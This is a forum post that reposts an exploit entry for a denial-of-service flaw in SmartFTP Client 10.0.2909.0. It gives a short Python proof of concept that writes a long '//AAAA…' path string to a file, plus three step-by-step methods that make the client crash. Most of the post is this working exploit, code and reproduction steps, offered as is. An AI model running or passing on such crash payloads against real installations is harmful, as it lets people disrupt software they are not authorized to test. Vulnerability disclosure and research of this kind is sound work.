This CHT Posted November 4, 2022 Group: The leader of the Content Count: 4,798 Achievement Points: 31,702 With Us For: 244 Days Status: Offline Last Seen: May 19 Device: Windows Share Posted November 4, 2022 # Exploit Title: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service # Date: 9/5/2021 # Exploit Author: Eric Salario # Vendor Homepage: https://www.smartftp.com/en-us/ # Software Link: https://www.smartftp.com/en-us/download # Version: 10.0.2909.0 (32 and 64 bit) # Tested on: Microsoft Windows 10 32 bit and 64 bit ========================================================================= buffer = "//" buffer += "A" * 423 f = open ("path.txt", "w") f.write(buffer) f.close() 1. Run the python script 2. Open SmartFTP > New Connection > FTPS (explicit) 3. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255) 4. In Path, copy paste the content of the "path.txt" generated by the python script 5. Click "OK" 6. SmartFTP client crashes ======================================================================= 1. Open SmartFTP > New Connection > FTPS (explicit) 2. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255) 3. In Path, type slash ("/") and click "OK" 4. The app should return "Error 0x80072741" 5. In the path's search bar, replace slash ("/") with whatever and press enter 6. SmartFTP client crashes ======================================================================= 1. Open SmartFTP 2. In the "New Connection" bar, clear the history (dropdown to the right of the bar) 3. Once the history is empty, click the bar and type anything 3. SmartFTP client crashes Link to comment Share on other sites More sharing options...
Recommended Posts